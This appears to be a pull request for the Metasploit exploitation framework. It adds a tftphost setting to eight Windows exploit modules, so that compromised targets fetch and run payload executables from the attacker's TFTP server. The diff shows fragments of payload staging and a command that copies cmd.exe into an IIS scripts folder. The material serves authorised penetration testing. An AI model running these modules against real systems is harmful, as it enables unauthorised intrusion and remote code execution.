### PR TITLE
exploits: Set tftphost option for modules which use Windows TFTP stager

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -91,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")

--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -106,7 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
     exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")

--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -50,16 +50,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def windows_stager
-
-    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.', :cgifname => exe_fname })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")
     execute_command(@payload_exe)
-
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")

--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.' })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")
     execute_command(@payload_exe)
-
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -344,7 +344,8 @@ class MetasploitModule < Msf::Exploit::Remote
       res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
 
       # Use the CMD stager to get a payload running
-      execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
 
       # Save these file names for later deletion
       @exe_cmd_copy = exe_fname

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -173,7 +173,8 @@ Processor-Speed=#{processor_speed}
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
-    execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp })
+    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
   end
 
   def on_new_session(client)

--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -99,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
     method = datastore['METHOD'].downcase
 
     if (method =~ /^cmd/)
-      execute_cmdstager({ :linemax => 1500, :nodelete => true })
-      #execute_cmdstager({ :linemax => 1500 })
+      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
     else
       # Generate the EXE, this is the same no matter what delivery mechanism we use
       exe = generate_payload_exe


### PR DESCRIPTION
Windows exploit modules which use the TFTP command stager require a `tftphost` option to be set (https://github.com/rapid7/rex-exploitation/pull/34 https://github.com/rapid7/rex-exploitation/issues/31).

This PR adds this option to the following modules (all modules which force set `'CmdStagerFlavor' => 'tftp'`):

* modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
* modules/exploits/multi/http/struts_code_exec.rb
* modules/exploits/windows/antivirus/ams_xfr.rb
* modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
* modules/exploits/windows/http/osb_uname_jlist.rb
* modules/exploits/windows/iis/msadc.rb
* modules/exploits/windows/misc/altiris_ds_sqli.rb
* modules/exploits/windows/mssql/mssql_payload.rb

It does not patch `modules/exploits/windows/iis/ms01_026_dbldecode.rb`  as this is addressed in #16724.

Note: Many of these modules likely won't work for other reasons (such as using a Meterpreter payload by default). Fixing the TFTP stager means at least one less thing is broken. `set HttpTrace true` can be used to show the before and after effect of this patch.
